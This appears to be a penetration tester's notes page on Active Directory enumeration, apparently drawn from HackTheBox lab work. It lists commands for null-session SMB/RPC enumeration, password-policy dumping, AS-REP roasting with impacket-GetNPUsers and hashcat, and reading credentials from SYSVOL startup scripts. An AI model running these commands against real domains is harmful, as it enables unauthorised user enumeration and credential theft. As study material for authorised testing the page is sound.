Misc

Enum4linux

Pull a lot of information out of the Domain Controller using enum4linux

enum4linux 10.10.10.161

Password Policy enumeration

crackmapexec smb 10.10.10.161 -u '' -p '' --pass-pol

Put in the report that null authentication allows for domain enumeration

RPCClient

rpcclient -U '' -N 10.10.10.161
enumdomusers
queryusergroups [rid]
queryuser [rid]
querygroup [rid]

GetNPUsers

Queries target domain for users with 'Do not require Kerberos preauthentication' set and export their TGTs for cracking

impacket-GetNPUsers -dc-ip 10.10.10.161 -request htb.local/ -format hashcat

hashcat --example-hashes | grep -i krb
hashcat --example-hashes | less

Credentials inside SYSVOL

Credentials may be stored inside of a script in the SYSVOL of the domain controller. Can happen on old AD environments.

Anyone with domain credentials can access the SYSVOL. To assign default local admin credentials LAPS is now used instead of scripts via Group Policy

dir \\conda.local\SYSVOL\conda.local

Example path: \\conda.local\SYSVOL\conda.local\Policies{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps1

C:\Windows\system32>type \\conda.local\SYSVOL\conda.local\Policies\{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps1
type \\conda.local\SYSVOL\conda.local\Policies\{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps1
$computer=$env:computername
$user = "Administrator"
$Password = "DefaultAdminPass1!"
$user = [adsi]"WinNT://$computer/$user,user"
$user.SetPassword($Password)
net user administrator /active:yes

SMB and RPC Null Authentication

smbclient -L \\\\10.10.10.100\\ -U '' -N

rpcclient -U '' -N 10.10.10.169

Notes

If the SID of a group is more than 500 or above 1000 then it is not a default Windows group and was created

PreviousPassback Attack NextPost-Compromise Enumeration

Last updated 1 year ago